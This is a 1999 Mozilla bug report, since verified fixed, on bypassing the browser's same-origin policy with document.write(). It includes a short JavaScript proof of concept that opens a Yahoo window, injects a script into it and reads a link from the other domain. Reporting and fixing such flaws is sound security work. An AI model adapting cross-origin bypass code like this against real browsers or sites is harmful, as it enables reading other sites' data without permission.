Closed Bug 14443 Opened 25 years ago Closed 25 years ago

"Same origin" security policy may be circumvented using document.write()

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

On builds 1999092013 and 1999091914 "Same origin" security may be circumvented
using document.write().
I have made a demonstration that reads links from documents from another domain,
 I am pretty sure access to other elements may be done.
The code that reads links from Yahoo is:
--------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com","a");
setTimeout('a.document.open();a.document.write("<SCRIPT>b=window.open(\'http://w
ww.yahoo.com\');s=\'Here  is the first link from Yahoo:
\';setTimeout(\'alert(s+b.document.links[0].href)\',20000);</"+"SCRIPT>");a.docu
ment.close();',20000);
</SCRIPT>
--------------------------------------

Demonstration is available at: http://www.nat.bg/~joro/mozilla/links1.html
Status: NEW → ASSIGNED
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Status: RESOLVED → VERIFIED
Windows NT 1999120208 Comm
Verified
...'[Exception... "Security error"'...
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.